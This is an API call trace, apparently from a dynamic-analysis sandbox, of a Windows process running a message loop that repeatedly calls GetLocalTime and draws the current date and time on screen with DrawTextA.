[0128.545] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x11e)) [0128.545] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x11e)) [0128.545] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0128.567] TranslateMessage (lpMsg=0x2347a14) returned 0 [0128.567] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0128.567] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x134)) [0128.567] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x134)) [0128.567] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0128.578] TranslateMessage (lpMsg=0x2347a14) returned 0 [0128.578] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0128.578] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x13f)) [0128.578] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x13f)) [0128.578] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0128.588] TranslateMessage (lpMsg=0x2347a14) returned 0 [0128.588] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0128.588] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x149)) [0128.588] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x149)) [0128.588] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0128.610] TranslateMessage (lpMsg=0x2347a14) returned 0 [0128.610] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0128.610] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x15f)) [0128.610] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x15f)) [0128.610] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0128.620] TranslateMessage (lpMsg=0x2347a14) returned 0 [0128.620] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0128.620] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x169)) [0128.620] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x169)) [0128.620] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0128.641] TranslateMessage (lpMsg=0x2347a14) returned 0 [0128.641] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0128.641] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x17e)) [0128.641] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x17e)) [0128.641] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0128.651] TranslateMessage (lpMsg=0x2347a14) returned 0 [0128.651] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0128.651] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x188)) [0128.651] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x188)) [0128.651] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0128.674] TranslateMessage (lpMsg=0x2347a14) returned 0 [0128.674] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0128.674] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x19f)) [0128.674] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x19f)) [0128.674] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0128.685] TranslateMessage (lpMsg=0x2347a14) returned 0 [0128.685] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0128.685] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x1aa)) [0128.685] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x1aa)) [0128.685] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0128.706] TranslateMessage (lpMsg=0x2347a14) returned 0 [0128.706] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0128.706] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x1bf)) [0128.706] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x1bf)) [0128.706] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0128.717] TranslateMessage (lpMsg=0x2347a14) returned 0 [0128.717] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0128.717] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x1ca)) [0128.717] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x1ca)) [0128.717] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0128.730] TranslateMessage (lpMsg=0x2347a14) returned 0 [0128.730] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0128.730] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x1d7)) [0128.730] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x1d7)) [0128.730] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0128.749] TranslateMessage (lpMsg=0x2347a14) returned 0 [0128.749] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0128.749] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x1ea)) [0128.749] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x1ea)) [0128.749] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0128.777] TranslateMessage (lpMsg=0x2347a14) returned 0 [0128.777] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0128.777] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x206)) [0128.777] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x206)) [0128.777] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0128.781] TranslateMessage (lpMsg=0x2347a14) returned 0 [0128.781] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0128.781] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x20a)) [0128.781] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x20a)) [0128.781] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0129.585] TranslateMessage (lpMsg=0x2347a14) returned 0 [0129.585] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0129.585] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3b, wMilliseconds=0x146)) [0129.585] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3b, wMilliseconds=0x146)) [0129.585] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0129.586] GetDC (hWnd=0x0) returned 0xa0100d0 [0129.586] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0129.586] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0129.586] GetSysColor (nIndex=8) returned 0x0 [0129.586] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0129.586] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0129.586] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0129.586] UnrealizeObject (h=0x2d10099f) returned 1 [0129.586] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0129.586] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0129.586] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0129.586] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:49:59 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:49:59 PM", lprc=0x19f5bd) returned 13 [0129.587] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0129.587] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0129.587] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0129.587] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0129.587] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0129.587] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0129.595] TranslateMessage (lpMsg=0x2347a14) returned 0 [0129.595] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0129.595] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3b, wMilliseconds=0x150)) [0129.595] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3b, wMilliseconds=0x150)) [0129.595] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0129.606] TranslateMessage (lpMsg=0x2347a14) returned 0 [0129.606] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0129.606] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3b, wMilliseconds=0x15b)) [0129.606] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3b, wMilliseconds=0x15b)) [0129.606] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0129.627] TranslateMessage (lpMsg=0x2347a14) returned 0 [0129.627] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0129.627] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3b, wMilliseconds=0x170)) [0129.627] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3b, wMilliseconds=0x170)) [0129.627] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0129.765] TranslateMessage (lpMsg=0x2347a14) returned 0 [0129.765] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0129.765] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3b, wMilliseconds=0x1fa)) [0129.765] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3b, wMilliseconds=0x1fa)) [0129.765] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0129.767] TranslateMessage (lpMsg=0x2347a14) returned 0 [0129.767] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0129.767] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3b, wMilliseconds=0x1fc)) [0129.767] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3b, wMilliseconds=0x1fc)) [0129.768] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0129.780] TranslateMessage (lpMsg=0x2347a14) returned 0 [0129.780] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0129.780] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3b, wMilliseconds=0x208)) [0129.780] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3b, wMilliseconds=0x209)) [0129.780] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0129.801] TranslateMessage (lpMsg=0x2347a14) returned 0 [0129.801] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0129.801] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3b, wMilliseconds=0x21e)) [0129.801] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3b, wMilliseconds=0x21e)) [0129.801] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0130.536] TranslateMessage (lpMsg=0x2347a14) returned 0 [0130.537] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0130.537] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x0, wMilliseconds=0x115)) [0130.537] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x0, wMilliseconds=0x115)) [0130.537] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0130.537] GetDC (hWnd=0x0) returned 0xa0100d0 [0130.537] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0130.537] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0130.537] GetSysColor (nIndex=8) returned 0x0 [0130.537] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0130.537] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0130.537] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0130.537] UnrealizeObject (h=0x2d10099f) returned 1 [0130.537] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0130.537] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0130.537] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0130.537] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:50:00 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:50:00 PM", lprc=0x19f5bd) returned 13 [0130.538] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0130.538] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0130.538] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0130.538] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0130.538] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0130.538] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0130.545] TranslateMessage (lpMsg=0x2347a14) returned 0 [0130.545] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0130.545] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x0, wMilliseconds=0x11e)) [0130.546] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x0, wMilliseconds=0x11e)) [0130.546] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0130.566] TranslateMessage (lpMsg=0x2347a14) returned 0 [0130.566] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0130.566] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x0, wMilliseconds=0x133)) [0130.566] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x0, wMilliseconds=0x133)) [0130.566] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0130.634] TranslateMessage (lpMsg=0x2347a14) returned 0 [0130.634] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0130.634] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x0, wMilliseconds=0x176)) [0130.634] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x0, wMilliseconds=0x176)) [0130.634] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0131.319] TranslateMessage (lpMsg=0x2347a14) returned 0 [0131.319] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0131.319] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x3b)) [0131.319] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x3c)) [0131.319] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0131.319] GetDC (hWnd=0x0) returned 0xa0100d0 [0131.320] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0131.320] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0131.320] GetSysColor (nIndex=8) returned 0x0 [0131.320] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0131.320] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0131.321] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0131.321] UnrealizeObject (h=0x2d10099f) returned 1 [0131.321] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0131.321] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0131.321] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0131.321] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:50:01 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:50:01 PM", lprc=0x19f5bd) returned 13 [0131.323] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0131.323] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0131.323] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0131.323] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0131.323] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0131.323] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0131.471] TranslateMessage (lpMsg=0x2347a14) returned 0 [0131.471] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0131.471] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0xd3)) [0131.471] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0xd3)) [0131.471] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0131.480] TranslateMessage (lpMsg=0x2347a14) returned 0 [0131.480] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0131.481] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0xdd)) [0131.481] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, 